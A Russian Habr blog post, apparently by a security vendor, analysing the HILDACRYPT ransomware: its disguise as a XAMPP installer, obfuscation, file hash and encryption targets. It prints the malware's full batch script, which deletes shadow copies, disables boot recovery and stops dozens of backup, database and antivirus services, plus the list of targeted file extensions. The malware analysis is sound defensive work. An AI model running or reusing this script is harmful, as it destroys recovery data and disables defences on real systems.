HILDACRYPT: новая ΠΏΡ€ΠΎΠ³Ρ€Π°ΠΌΠΌΠ°-Π²Ρ‹ΠΌΠΎΠ³Π°Ρ‚Π΅Π»ΡŒ наносит ΡƒΠ΄Π°Ρ€ ΠΏΠΎ систСмам Ρ€Π΅Π·Π΅Ρ€Π²Π½ΠΎΠ³ΠΎ копирования ΠΈ антивирусным Ρ€Π΅ΡˆΠ΅Π½ΠΈΡΠΌ

ΠŸΡ€ΠΈΠ²Π΅Ρ‚, Π₯Π°Π±Ρ€! И снова ΠΌΡ‹ рассказываСм ΠΎ свСТих вСрсиях врСдоносного ПО ΠΈΠ· ΠΊΠ°Ρ‚Π΅Π³ΠΎΡ€ΠΈΠΈ Ransomware. HILDACRYPT β€” это новая ΠΏΡ€ΠΎΠ³Ρ€Π°ΠΌΠΌΠ°-Π²Ρ‹ΠΌΠΎΠ³Π°Ρ‚Π΅Π»ΡŒ, ΠΏΡ€Π΅Π΄ΡΡ‚Π°Π²ΠΈΡ‚Π΅Π»ΡŒ ΠΎΠ±Π½Π°Ρ€ΡƒΠΆΠ΅Π½Π½ΠΎΠ³ΠΎ Π² августС 2019 Π³ΠΎΠ΄Π° сСмСйства Hilda, Π½Π°Π·Π²Π°Π½Π½ΠΎΠ³ΠΎ Π² Ρ‡Π΅ΡΡ‚ΡŒ ΠΌΡƒΠ»ΡŒΡ‚Ρ„ΠΈΠ»ΡŒΠΌΠ° стримингового сСрвиса Netflix, ΠΊΠΎΡ‚ΠΎΡ€Ρ‹ΠΉ Π±Ρ‹Π» использован для распространСния ПО. БСгодня ΠΌΡ‹ знакомимся с тСхничСскими особСнностями Ρ€Π°Π±ΠΎΡ‚Ρ‹ этого ΠΎΠ±Π½ΠΎΠ²Π»Π΅Π½Π½ΠΎΠ³ΠΎ вируса-вымогатСля.

HILDACRYPT: новая ΠΏΡ€ΠΎΠ³Ρ€Π°ΠΌΠΌΠ°-Π²Ρ‹ΠΌΠΎΠ³Π°Ρ‚Π΅Π»ΡŒ наносит ΡƒΠ΄Π°Ρ€ ΠΏΠΎ систСмам Ρ€Π΅Π·Π΅Ρ€Π²Π½ΠΎΠ³ΠΎ копирования ΠΈ антивирусным Ρ€Π΅ΡˆΠ΅Π½ΠΈΡΠΌ

Π’ ΠΏΠ΅Ρ€Π²ΠΎΠΉ вСрсии Π²Ρ‹ΠΌΠΎΠ³Π°Ρ‚Π΅Π»Π΅ΠΉ Hilda ссылка Π½Π° Ρ€Π°Π·ΠΌΠ΅Ρ‰Π΅Π½Π½Ρ‹ΠΉ Π½Π° Youtube Ρ‚Ρ€Π΅ΠΉΠ»Π΅Ρ€ ΠΌΡƒΠ»ΡŒΡ‚ΠΈΠΏΠ»ΠΈΠΊΠ°Ρ†ΠΈΠΎΠ½Π½ΠΎΠ³ΠΎ сСриала ΡΠΎΠ΄Π΅Ρ€ΠΆΠ°Π»Π°ΡΡŒ Π² письмС ΠΎ Π²Ρ‹ΠΊΡƒΠΏΠ΅. HILDACRYPT ΠΆΠ΅ маскируСтся ΠΏΠΎΠ΄ Π»Π΅Π³ΠΈΡ‚ΠΈΠΌΠ½Ρ‹ΠΉ установщик XAMPP β€” простой Π² установкС дистрибутив Apache, Π²ΠΊΠ»ΡŽΡ‡Π°ΡŽΡ‰ΠΈΠΉ MariaDB, PHP ΠΈ Perl. ΠŸΡ€ΠΈ этом Ρƒ ΠΊΡ€ΠΈΠΏΡ‚ΠΎΠ»ΠΎΠΊΠ΅Ρ€Π° Π΄Ρ€ΡƒΠ³ΠΎΠ΅ имя Ρ„Π°ΠΉΠ»Π° β€” xamp. ΠšΡ€ΠΎΠΌΠ΅ Ρ‚ΠΎΠ³ΠΎ, Ρ„Π°ΠΉΠ» ΠΏΡ€ΠΎΠ³Ρ€Π°ΠΌΠΌΡ‹-вымогатСля Π½Π΅ ΠΈΠΌΠ΅Π΅Ρ‚ элСктронной подписи.

БтатичСский Π°Π½Π°Π»ΠΈΠ·

ΠŸΡ€ΠΎΠ³Ρ€Π°ΠΌΠΌΠ°-Π²Ρ‹ΠΌΠΎΠ³Π°Ρ‚Π΅Π»ΡŒ содСрТится Π² Ρ„Π°ΠΉΠ»Π΅ PE32 .NET, написанном ΠΏΠΎΠ΄ MS Windows. Π•Π³ΠΎ Ρ€Π°Π·ΠΌΠ΅Ρ€ составляСт 135 168 Π±Π°ΠΉΡ‚. Как основной ΠΏΡ€ΠΎΠ³Ρ€Π°ΠΌΠΌΠ½Ρ‹ΠΉ ΠΊΠΎΠ΄, Ρ‚Π°ΠΊ ΠΈ ΠΊΠΎΠ΄ ΠΏΡ€ΠΎΠ³Ρ€Π°ΠΌΠΌΡ‹-Π·Π°Ρ‰ΠΈΡ‚Π½ΠΈΠΊΠ° написаны Π½Π° Π‘#. Богласно ΠΎΡ‚ΠΌΠ΅Ρ‚ΠΊΠ΅ ΠΎ Π΄Π°Ρ‚Π΅ ΠΈ Π²Ρ€Π΅ΠΌΠ΅Π½ΠΈ компиляции, Π΄Π²ΠΎΠΈΡ‡Π½Ρ‹ΠΉ Ρ„Π°ΠΉΠ» Π±Ρ‹Π» создан 14 сСнтября 2019 Π³ΠΎΠ΄Π°.

HILDACRYPT: новая ΠΏΡ€ΠΎΠ³Ρ€Π°ΠΌΠΌΠ°-Π²Ρ‹ΠΌΠΎΠ³Π°Ρ‚Π΅Π»ΡŒ наносит ΡƒΠ΄Π°Ρ€ ΠΏΠΎ систСмам Ρ€Π΅Π·Π΅Ρ€Π²Π½ΠΎΠ³ΠΎ копирования ΠΈ антивирусным Ρ€Π΅ΡˆΠ΅Π½ΠΈΡΠΌ

По Π΄Π°Π½Π½Ρ‹ΠΌ Detect It Easy, вирус-Π²Ρ‹ΠΌΠΎΠ³Π°Ρ‚Π΅Π»ΡŒ Π·Π°Π°Ρ€Ρ…ΠΈΠ²ΠΈΡ€ΠΎΠ²Π°Π½ с ΠΏΠΎΠΌΠΎΡ‰ΡŒΡŽ Confuser ΠΈ ConfuserEx, Π½ΠΎ эти обфускаторы Ρ‚Π°ΠΊΠΈΠ΅ ΠΆΠ΅, ΠΊΠ°ΠΊ ΠΏΡ€Π΅ΠΆΠ΄Π΅, Ρ‚ΠΎΠ»ΡŒΠΊΠΎ ConfuserEx являСтся ΠΏΡ€Π΅Π΅ΠΌΠ½ΠΈΠΊΠΎΠΌ Confuser, Ρ‚Π°ΠΊ Ρ‡Ρ‚ΠΎ сигнатуры ΠΈΡ… ΠΊΠΎΠ΄ΠΎΠ² ΡΠ²Π»ΡΡŽΡ‚ΡΡ схоТими.

HILDACRYPT: новая ΠΏΡ€ΠΎΠ³Ρ€Π°ΠΌΠΌΠ°-Π²Ρ‹ΠΌΠΎΠ³Π°Ρ‚Π΅Π»ΡŒ наносит ΡƒΠ΄Π°Ρ€ ΠΏΠΎ систСмам Ρ€Π΅Π·Π΅Ρ€Π²Π½ΠΎΠ³ΠΎ копирования ΠΈ антивирусным Ρ€Π΅ΡˆΠ΅Π½ΠΈΡΠΌ

HILDACRYPT Π΄Π΅ΠΉΡΡ‚Π²ΠΈΡ‚Π΅Π»ΡŒΠ½ΠΎ Π·Π°ΠΏΠ°ΠΊΠΎΠ²Π°Π½ с ΠΏΠΎΠΌΠΎΡ‰ΡŒΡŽ ConfuserEx.

HILDACRYPT: новая ΠΏΡ€ΠΎΠ³Ρ€Π°ΠΌΠΌΠ°-Π²Ρ‹ΠΌΠΎΠ³Π°Ρ‚Π΅Π»ΡŒ наносит ΡƒΠ΄Π°Ρ€ ΠΏΠΎ систСмам Ρ€Π΅Π·Π΅Ρ€Π²Π½ΠΎΠ³ΠΎ копирования ΠΈ антивирусным Ρ€Π΅ΡˆΠ΅Π½ΠΈΡΠΌ

SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a

Π’Π΅ΠΊΡ‚ΠΎΡ€ Π°Ρ‚Π°ΠΊΠΈ

Π‘ΠΊΠΎΡ€Π΅Π΅ всСго, ΠΏΡ€ΠΎΠ³Ρ€Π°ΠΌΠΌΠ°-Π²Ρ‹ΠΌΠΎΠ³Π°Ρ‚Π΅Π»ΡŒ Π±Ρ‹Π»Π° ΠΎΠ±Π½Π°Ρ€ΡƒΠΆΠ΅Π½Π° Π½Π° ΠΎΠ΄Π½ΠΎΠΌ ΠΈΠ· сайтов, посвящСнных Π²Π΅Π±-ΠΏΡ€ΠΎΠ³Ρ€Π°ΠΌΠΌΠΈΡ€ΠΎΠ²Π°Π½ΠΈΡŽ, ΠΌΠ°ΡΠΊΠΈΡ€ΡƒΡΡΡŒ ΠΏΠΎΠ΄ Π»Π΅Π³ΠΈΡ‚ΠΈΠΌΠ½ΡƒΡŽ ΠΏΡ€ΠΎΠ³Ρ€Π°ΠΌΠΌΡƒ XAMPP.

Π’ΡΡŽ Ρ†Π΅ΠΏΠΎΡ‡ΠΊΡƒ зараТСния ΠΌΠΎΠΆΠ½ΠΎ ΡƒΠ²ΠΈΠ΄Π΅Ρ‚ΡŒ Π² app.any.run sandbox.

ΠžΠ±Ρ„ΡƒΡΠΊΠ°Ρ†ΠΈΡ

Π‘Ρ‚Ρ€ΠΎΠΊΠΈ ΠΏΡ€ΠΎΠ³Ρ€Π°ΠΌΠΌΡ‹-вымогатСля хранятся Π² Π·Π°ΡˆΠΈΡ„Ρ€ΠΎΠ²Π°Π½Π½ΠΎΠΌ Π²ΠΈΠ΄Π΅. ΠŸΡ€ΠΈ запускС HILDACRYPT Ρ€Π°ΡΡˆΠΈΡ„Ρ€ΠΎΠ²Ρ‹Π²Π°Π΅Ρ‚ ΠΈΡ… с ΠΏΠΎΠΌΠΎΡ‰ΡŒΡŽ Base64 ΠΈ AES-256-CBC.

HILDACRYPT: новая ΠΏΡ€ΠΎΠ³Ρ€Π°ΠΌΠΌΠ°-Π²Ρ‹ΠΌΠΎΠ³Π°Ρ‚Π΅Π»ΡŒ наносит ΡƒΠ΄Π°Ρ€ ΠΏΠΎ систСмам Ρ€Π΅Π·Π΅Ρ€Π²Π½ΠΎΠ³ΠΎ копирования ΠΈ антивирусным Ρ€Π΅ΡˆΠ΅Π½ΠΈΡΠΌ

Установка

ΠŸΡ€Π΅ΠΆΠ΄Π΅ всСго ΠΏΡ€ΠΎΠ³Ρ€Π°ΠΌΠΌΠ°-Π²Ρ‹ΠΌΠΎΠ³Π°Ρ‚Π΅Π»ΡŒ создаСт Π² %AppDataRoaming% ΠΏΠ°ΠΏΠΊΡƒ, Ρƒ ΠΊΠΎΡ‚ΠΎΡ€ΠΎΠΉ ΠΏΠ°Ρ€Π°ΠΌΠ΅Ρ‚Ρ€ GUID (Globally Unique Identifier)гСнСрируСтся случайным ΠΎΠ±Ρ€Π°Π·ΠΎΠΌ. Добавляя Π² это располоТСниС bat-Ρ„Π°ΠΉΠ», вирус-Π²Ρ‹ΠΌΠΎΠ³Π°Ρ‚Π΅Π»ΡŒ запускаСт Π΅Π³ΠΎ с ΠΏΠΎΠΌΠΎΡ‰ΡŒΡŽ cmd.exe:

cmd.exe /c JKfgkgj3hjgfhjka.bat & exit

HILDACRYPT: новая ΠΏΡ€ΠΎΠ³Ρ€Π°ΠΌΠΌΠ°-Π²Ρ‹ΠΌΠΎΠ³Π°Ρ‚Π΅Π»ΡŒ наносит ΡƒΠ΄Π°Ρ€ ΠΏΠΎ систСмам Ρ€Π΅Π·Π΅Ρ€Π²Π½ΠΎΠ³ΠΎ копирования ΠΈ антивирусным Ρ€Π΅ΡˆΠ΅Π½ΠΈΡΠΌHILDACRYPT: новая ΠΏΡ€ΠΎΠ³Ρ€Π°ΠΌΠΌΠ°-Π²Ρ‹ΠΌΠΎΠ³Π°Ρ‚Π΅Π»ΡŒ наносит ΡƒΠ΄Π°Ρ€ ΠΏΠΎ систСмам Ρ€Π΅Π·Π΅Ρ€Π²Π½ΠΎΠ³ΠΎ копирования ΠΈ антивирусным Ρ€Π΅ΡˆΠ΅Π½ΠΈΡΠΌ
Π—Π°Ρ‚Π΅ΠΌ ΠΎΠ½ Π½Π°Ρ‡ΠΈΠ½Π°Π΅Ρ‚ Π²Ρ‹ΠΏΠΎΠ»Π½Π΅Π½ΠΈΠ΅ ΠΏΠ°ΠΊΠ΅Ρ‚Π½ΠΎΠ³ΠΎ скрипта, Ρ‡Ρ‚ΠΎΠ±Ρ‹ ΠΎΡ‚ΠΊΠ»ΡŽΡ‡ΠΈΡ‚ΡŒ систСмныС Ρ„ΡƒΠ½ΠΊΡ†ΠΈΠΈ ΠΈΠ»ΠΈ слуТбы.

HILDACRYPT: новая ΠΏΡ€ΠΎΠ³Ρ€Π°ΠΌΠΌΠ°-Π²Ρ‹ΠΌΠΎΠ³Π°Ρ‚Π΅Π»ΡŒ наносит ΡƒΠ΄Π°Ρ€ ΠΏΠΎ систСмам Ρ€Π΅Π·Π΅Ρ€Π²Π½ΠΎΠ³ΠΎ копирования ΠΈ антивирусным Ρ€Π΅ΡˆΠ΅Π½ΠΈΡΠΌ

Π‘ΠΊΡ€ΠΈΠΏΡ‚ содСрТит Π΄Π»ΠΈΠ½Π½Ρ‹ΠΉ список ΠΊΠΎΠΌΠ°Π½Π΄, с ΠΏΠΎΠΌΠΎΡ‰ΡŒΡŽ ΠΊΠΎΡ‚ΠΎΡ€Ρ‹Ρ… ΡƒΠ½ΠΈΡ‡Ρ‚ΠΎΠΆΠ°ΡŽΡ‚ΡΡ Ρ‚Π΅Π½Π΅Π²Ρ‹Π΅ ΠΊΠΎΠΏΠΈΠΈ, ΠΎΡ‚ΠΊΠ»ΡŽΡ‡Π°Π΅Ρ‚ΡΡ SQL-сСрвСр, Ρ€Π΅Π·Π΅Ρ€Π²Π½ΠΎΠ΅ ΠΊΠΎΠΏΠΈΡ€ΠΎΠ²Π°Π½ΠΈΠ΅ ΠΈ антивирусныС Ρ€Π΅ΡˆΠ΅Π½ΠΈΡ.

НапримСр, ΠΎΠ½ Π±Π΅Π·ΡƒΡΠΏΠ΅ΡˆΠ½ΠΎ пытаСтся ΠΎΡΡ‚Π°Π½ΠΎΠ²ΠΈΡ‚ΡŒ слуТбы Ρ€Π΅Π·Π΅Ρ€Π²Π½ΠΎΠ³ΠΎ копирования Acronis Backup. ΠšΡ€ΠΎΠΌΠ΅ Ρ‚ΠΎΠ³ΠΎ, ΠΎΠ½ Π°Ρ‚Π°ΠΊΡƒΠ΅Ρ‚ систСмы Ρ€Π΅Π·Π΅Ρ€Π²Π½ΠΎΠ³ΠΎ копирования ΠΈ антивирусныС Ρ€Π΅ΡˆΠ΅Π½ΠΈΡ ΡΠ»Π΅Π΄ΡƒΡŽΡ‰ΠΈΡ… поставщиков: Veeam, Sophos, Kaspersky, McAfee ΠΈ Π΄Ρ€ΡƒΠ³ΠΈΡ….

@echo off
:: Not really a fan of ponies, cartoon girls are better, don't you think?
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
bcdedit /set {default} recoveryenabled No
bcdedit /set {default} bootstatuspolicy ignoreallfailures
vssadmin Delete Shadows /all /quiet
net stop SQLAgent$SYSTEM_BGC /y
net stop β€œSophos Device Control Service” /y
net stop macmnsvc /y
net stop SQLAgent$ECWDB2 /y
net stop β€œZoolz 2 Service” /y
net stop McTaskManager /y
net stop β€œSophos AutoUpdate Service” /y
net stop β€œSophos System Protection Service” /y
net stop EraserSvc11710 /y
net stop PDVFSService /y
net stop SQLAgent$PROFXENGAGEMENT /y
net stop SAVService /y
net stop MSSQLFDLauncher$TPSAMA /y
net stop EPSecurityService /y
net stop SQLAgent$SOPHOS /y
net stop β€œSymantec System Recovery” /y
net stop Antivirus /y
net stop SstpSvc /y
net stop MSOLAP$SQL_2008 /y
net stop TrueKeyServiceHelper /y
net stop sacsvr /y
net stop VeeamNFSSvc /y
net stop FA_Scheduler /y
net stop SAVAdminService /y
net stop EPUpdateService /y
net stop VeeamTransportSvc /y
net stop β€œSophos Health Service” /y
net stop bedbg /y
net stop MSSQLSERVER /y
net stop KAVFS /y
net stop Smcinst /y
net stop MSSQLServerADHelper100 /y
net stop TmCCSF /y
net stop wbengine /y
net stop SQLWriter /y
net stop MSSQLFDLauncher$TPS /y
net stop SmcService /y
net stop ReportServer$TPSAMA /y
net stop swi_update /y
net stop AcrSch2Svc /y
net stop MSSQL$SYSTEM_BGC /y
net stop VeeamBrokerSvc /y
net stop MSSQLFDLauncher$PROFXENGAGEMENT /y
net stop VeeamDeploymentService /y
net stop SQLAgent$TPS /y
net stop DCAgent /y
net stop β€œSophos Message Router” /y
net stop MSSQLFDLauncher$SBSMONITORING /y
net stop wbengine /y
net stop MySQL80 /y
net stop MSOLAP$SYSTEM_BGC /y
net stop ReportServer$TPS /y
net stop MSSQL$ECWDB2 /y
net stop SntpService /y
net stop SQLSERVERAGENT /y
net stop BackupExecManagementService /y
net stop SMTPSvc /y
net stop mfefire /y
net stop BackupExecRPCService /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop klnagent /y
net stop MSExchangeSA /y
net stop MSSQLServerADHelper /y
net stop SQLTELEMETRY /y
net stop β€œSophos Clean Service” /y
net stop swi_update_64 /y
net stop β€œSophos Web Control Service” /y
net stop EhttpSrv /y
net stop POP3Svc /y
net stop MSOLAP$TPSAMA /y
net stop McAfeeEngineService /y
net stop β€œVeeam Backup Catalog Data Service” /
net stop MSSQL$SBSMONITORING /y
net stop ReportServer$SYSTEM_BGC /y
net stop AcronisAgent /y
net stop KAVFSGT /y
net stop BackupExecDeviceMediaService /y
net stop MySQL57 /y
net stop McAfeeFrameworkMcAfeeFramework /y
net stop TrueKey /y
net stop VeeamMountSvc /y
net stop MsDtsServer110 /y
net stop SQLAgent$BKUPEXEC /y
net stop UI0Detect /y
net stop ReportServer /y
net stop SQLTELEMETRY$ECWDB2 /y
net stop MSSQLFDLauncher$SYSTEM_BGC /y
net stop MSSQL$BKUPEXEC /y
net stop SQLAgent$PRACTTICEBGC /y
net stop MSExchangeSRS /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop McShield /y
net stop SepMasterService /y
net stop β€œSophos MCS Client” /y
net stop VeeamCatalogSvc /y
net stop SQLAgent$SHAREPOINT /y
net stop NetMsmqActivator /y
net stop kavfsslp /y
net stop tmlisten /y
net stop ShMonitor /y
net stop MsDtsServer /y
net stop SQLAgent$SQL_2008 /y
net stop SDRSVC /y
net stop IISAdmin /y
net stop SQLAgent$PRACTTICEMGT /y
net stop BackupExecJobEngine /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop BackupExecAgentBrowser /y
net stop VeeamHvIntegrationSvc /y
net stop masvc /y
net stop W3Svc /y
net stop β€œSQLsafe Backup Service” /y
net stop SQLAgent$CXDB /y
net stop SQLBrowser /y
net stop MSSQLFDLauncher$SQL_2008 /y
net stop VeeamBackupSvc /y
net stop β€œSophos Safestore Service” /y
net stop svcGenericHost /y
net stop ntrtscan /y
net stop SQLAgent$VEEAMSQL2012 /y
net stop MSExchangeMGMT /y
net stop SamSs /y
net stop MSExchangeES /y
net stop MBAMService /y
net stop EsgShKernel /y
net stop ESHASRV /y
net stop MSSQL$TPSAMA /y
net stop SQLAgent$CITRIX_METAFRAME /y
net stop VeeamCloudSvc /y
net stop β€œSophos File Scanner Service” /y
net stop β€œSophos Agent” /y
net stop MBEndpointAgent /y
net stop swi_service /y
net stop MSSQL$PRACTICEMGT /y
net stop SQLAgent$TPSAMA /y
net stop McAfeeFramework /y
net stop β€œEnterprise Client Service” /y
net stop SQLAgent$SBSMONITORING /y
net stop MSSQL$VEEAMSQL2012 /y
net stop swi_filter /y
net stop SQLSafeOLRService /y
net stop BackupExecVSSProvider /y
net stop VeeamEnterpriseManagerSvc /y
net stop SQLAgent$SQLEXPRESS /y
net stop OracleClientCache80 /y
net stop MSSQL$PROFXENGAGEMENT /y
net stop IMAP4Svc /y
net stop ARSM /y
net stop MSExchangeIS /y
net stop AVP /y
net stop MSSQLFDLauncher /y
net stop MSExchangeMTA /y
net stop TrueKeyScheduler /y
net stop MSSQL$SOPHOS /y
net stop β€œSQL Backups” /y
net stop MSSQL$TPS /y
net stop mfemms /y
net stop MsDtsServer100 /y
net stop MSSQL$SHAREPOINT /y
net stop WRSVC /y
net stop mfevtp /y
net stop msftesql$PROD /y
net stop mozyprobackup /y
net stop MSSQL$SQL_2008 /y
net stop SNAC /y
net stop ReportServer$SQL_2008 /y
net stop BackupExecAgentAccelerator /y
net stop MSSQL$SQLEXPRESS /y
net stop MSSQL$PRACTTICEBGC /y
net stop VeeamRESTSvc /y
net stop sophossps /y
net stop ekrn /y
net stop MMS /y
net stop β€œSophos MCS Agent” /y
net stop RESvc /y
net stop β€œAcronis VSS Provider” /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop MSSQLFDLauncher$SHAREPOINT /y
net stop β€œSQLsafe Filter Service” /y
net stop MSSQL$PROD /y
net stop SQLAgent$PROD /y
net stop MSOLAP$TPS /y
net stop VeeamDeploySvc /y
net stop MSSQLServerOLAPService /y
del %0

ПослС Ρ‚ΠΎΠ³ΠΎ, ΠΊΠ°ΠΊ упомянутыС Π²Ρ‹ΡˆΠ΅ слуТбы ΠΈ процСссы ΠΎΡ‚ΠΊΠ»ΡŽΡ‡Π΅Π½Ρ‹, ΠΊΡ€ΠΈΠΏΡ‚ΠΎΠ»ΠΎΠΊΠ΅Ρ€ собираСт ΠΈΠ½Ρ„ΠΎΡ€ΠΌΠ°Ρ†ΠΈΡŽ ΠΎΠ±ΠΎ всСх Ρ€Π°Π±ΠΎΡ‚Π°ΡŽΡ‰ΠΈΡ… процСссах, ΠΈΡΠΏΠΎΠ»ΡŒΠ·ΡƒΡ ΠΊΠΎΠΌΠ°Π½Π΄Ρƒ tasklist, Ρ‡Ρ‚ΠΎΠ±Ρ‹ ΡƒΠ±Π΅Π΄ΠΈΡ‚ΡŒΡΡ Π² Ρ‚ΠΎΠΌ, Ρ‡Ρ‚ΠΎ всС Π½Π΅ΠΎΠ±Ρ…ΠΎΠ΄ΠΈΠΌΡ‹Π΅ слуТбы нСработоспособны.
tasklist v /fo csv

По этой ΠΊΠΎΠΌΠ°Π½Π΄Π΅ выводится ΠΏΠΎΠ΄Ρ€ΠΎΠ±Π½Ρ‹ΠΉ список Ρ€Π°Π±ΠΎΡ‚Π°ΡŽΡ‰ΠΈΡ… процСссов, элСмСнты ΠΊΠΎΡ‚ΠΎΡ€ΠΎΠ³ΠΎ Ρ€Π°Π·Π΄Π΅Π»Π΅Π½Ρ‹ Π·Π½Π°ΠΊΠΎΠΌ Β«,Β».
«Β«csrss.exeΒ»,Β«448Β»,Β«servicesΒ»,Β«0Β»,Β«1οΏ½896 οΏ½οΏ½Β»,Β«unknownΒ»,»οΏ½/οΏ½»,Β«0:00:03Β»,»οΏ½/οΏ½»»

HILDACRYPT: новая ΠΏΡ€ΠΎΠ³Ρ€Π°ΠΌΠΌΠ°-Π²Ρ‹ΠΌΠΎΠ³Π°Ρ‚Π΅Π»ΡŒ наносит ΡƒΠ΄Π°Ρ€ ΠΏΠΎ систСмам Ρ€Π΅Π·Π΅Ρ€Π²Π½ΠΎΠ³ΠΎ копирования ΠΈ антивирусным Ρ€Π΅ΡˆΠ΅Π½ΠΈΡΠΌ

ПослС этой ΠΏΡ€ΠΎΠ²Π΅Ρ€ΠΊΠΈ ΠΏΡ€ΠΎΠ³Ρ€Π°ΠΌΠΌΠ°-Π²Ρ‹ΠΌΠΎΠ³Π°Ρ‚Π΅Π»ΡŒ Π½Π°Ρ‡ΠΈΠ½Π°Π΅Ρ‚ процСсс ΡˆΠΈΡ„Ρ€ΠΎΠ²Π°Π½ΠΈΡ.

Π¨ΠΈΡ„Ρ€ΠΎΠ²Π°Π½ΠΈΠ΅

Π¨ΠΈΡ„Ρ€ΠΎΠ²Π°Π½ΠΈΠ΅ Ρ„Π°ΠΉΠ»ΠΎΠ²

HILDACRYPT ΠΏΡ€ΠΎΡ…ΠΎΠ΄ΠΈΡ‚ ΠΏΠΎ всСму Π½Π°ΠΉΠ΄Π΅Π½Π½ΠΎΠΌΡƒ содСрТимому ТСстких дисков, ΠΊΡ€ΠΎΠΌΠ΅ ΠΏΠ°ΠΏΠΎΠΊ Recycle.Bin ΠΈ Reference AssembliesMicrosoft. Π’ послСднСм содСрТатся критичСски Π²Π°ΠΆΠ½Ρ‹Π΅ Ρ„Π°ΠΉΠ»Ρ‹ dll, pdb, ΠΈ ΠΏΡ€. для ΠΏΡ€ΠΈΠ»ΠΎΠΆΠ΅Π½ΠΈΠΉ .Net, ΠΊΠΎΡ‚ΠΎΡ€Ρ‹Π΅ ΠΌΠΎΠ³ΡƒΡ‚ ΠΏΠΎΠ²Π»ΠΈΡΡ‚ΡŒ Π½Π° Ρ€Π°Π±ΠΎΡ‚Ρƒ ΠΏΡ€ΠΎΠ³Ρ€Π°ΠΌΠΌΡ‹-вымогатСля. Для поиска Ρ„Π°ΠΉΠ»ΠΎΠ², ΠΊΠΎΡ‚ΠΎΡ€Ρ‹Π΅ Π±ΡƒΠ΄ΡƒΡ‚ Π·Π°ΡˆΠΈΡ„Ρ€ΠΎΠ²Π°Π½Ρ‹, ΠΈΡΠΏΠΎΠ»ΡŒΠ·ΡƒΠ΅Ρ‚ΡΡ ΡΠ»Π΅Π΄ΡƒΡŽΡ‰ΠΈΠΉ список Ρ€Π°ΡΡˆΠΈΡ€Π΅Π½ΠΈΠΉ:

«.vb:.asmx:.config:.3dm:.3ds:.3fr:.3g2:.3gp:.3pr:.7z:.ab4:.accdb:.accde:.accdr:.accdt:.ach:.acr:.act:.adb:.ads:.agdl:.ai:.ait:.al:.apj:.arw:.asf:.asm:.asp:.aspx:.asx:.avi:.awg:.back:.backup:.backupdb:.bak:.lua:.m:.m4v:.max:.mdb:.mdc:.mdf:.mef:.mfw:.mmw:.moneywell:.mos:.mov:.mp3:.mp4:.mpg:.mpeg:.mrw:.msg:.myd:.nd:.ndd:.nef:.nk2:.nop:.nrw:.ns2:.ns3:.ns4:.nsd:.nsf:.nsg:.nsh:.nwb:.nx2:.nxl:.nyf:.tif:.tlg:.txt:.vob:.wallet:.war:.wav:.wb2:.wmv:.wpd:.wps:.x11:.x3f:.xis:.xla:.xlam:.xlk:.xlm:.xlr:.xls:.xlsb:.xlsm:.xlsx:.xlt:.xltm:.xltx:.xlw:.xml:.ycbcra:.yuv:.zip:.sqlite:.sqlite3:.sqlitedb:.sr2:.srf:.srt:.srw:.st4:.st5:.st6:.st7:.st8:.std:.sti:.stw:.stx:.svg:.swf:.sxc:.sxd:.sxg:.sxi:.sxm:.sxw:.tex:.tga:.thm:.tib:.py:.qba:.qbb:.qbm:.qbr:.qbw:.qbx:.qby:.r3d:.raf:.rar:.rat:.raw:.rdb:.rm:.rtf:.rw2:.rwl:.rwz:.s3db:.sas7bdat:.say:.sd0:.sda:.sdf:.sldm:.sldx:.sql:.pdd:.pdf:.pef:.pem:.pfx:.php:.php5:.phtml:.pl:.plc:.png:.pot:.potm:.potx:.ppam:.pps:.ppsm:.ppsx:.ppt:.pptm:.pptx:.prf:.ps:.psafe3:.psd:.pspimage:.pst:.ptx:.oab:.obj:.odb:.odc:.odf:.odg:.odm:.odp:.ods:.odt:.oil:.orf:.ost:.otg:.oth:.otp:.ots:.ott:.p12:.p7b:.p7c:.pab:.pages:.pas:.pat:.pbl:.pcd:.pct:.pdb:.gray:.grey:.gry:.h:.hbk:.hpp:.htm:.html:.ibank:.ibd:.ibz:.idx:.iif:.iiq:.incpas:.indd:.jar:.java:.jpe:.jpeg:.jpg:.jsp:.kbx:.kc2:.kdbx:.kdc:.key:.kpdx:.doc:.docm:.docx:.dot:.dotm:.dotx:.drf:.drw:.dtd:.dwg:.dxb:.dxf:.dxg:.eml:.eps:.erbsql:.erf:.exf:.fdb:.ffd:.fff:.fh:.fhd:.fla:.flac:.flv:.fmb:.fpx:.fxg:.cpp:.cr2:.craw:.crt:.crw:.cs:.csh:.csl:.csv:.dac:.bank:.bay:.bdb:.bgt:.bik:.bkf:.bkp:.blend:.bpw:.c:.cdf:.cdr:.cdr3:.cdr4:.cdr5:.cdr6:.cdrw:.cdx:.ce1:.ce2:.cer:.cfp:.cgm:.cib:.class:.cls:.cmt:.cpi:.ddoc:.ddrw:.dds:.der:.des:.design:.dgc:.djvu:.dng:.db:.db-journal:.db3:.dcr:.dcs:.ddd:.dbf:.dbx:.dc2:.pbl:.csproj:.sln:.vbproj:.mdb:.md»

